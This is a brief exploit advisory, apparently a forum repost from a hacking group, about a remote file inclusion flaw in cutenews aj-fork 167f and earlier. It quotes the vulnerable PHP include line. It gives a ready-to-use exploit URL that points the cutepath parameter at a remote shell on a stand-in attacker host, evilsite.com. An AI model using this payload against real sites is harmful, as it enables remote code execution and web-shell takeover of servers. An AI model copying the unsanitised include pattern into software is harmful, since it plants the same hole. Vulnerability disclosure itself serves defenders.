cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
[code]===========================================================================================================
DeltasecurityTEAM
[url]www.Deltasecurity.ir[/url]
===========================================================================================================
* Portal Name : cutenews aj-fork
* Class = Remote File Inclusion ;
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip
* Found by = DeltahackingTEAM
* User In Delta Team (Tanha )
----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------
include($cutepath.'/inc/plugins.php');
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?
----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug
[/code]
页:
[1]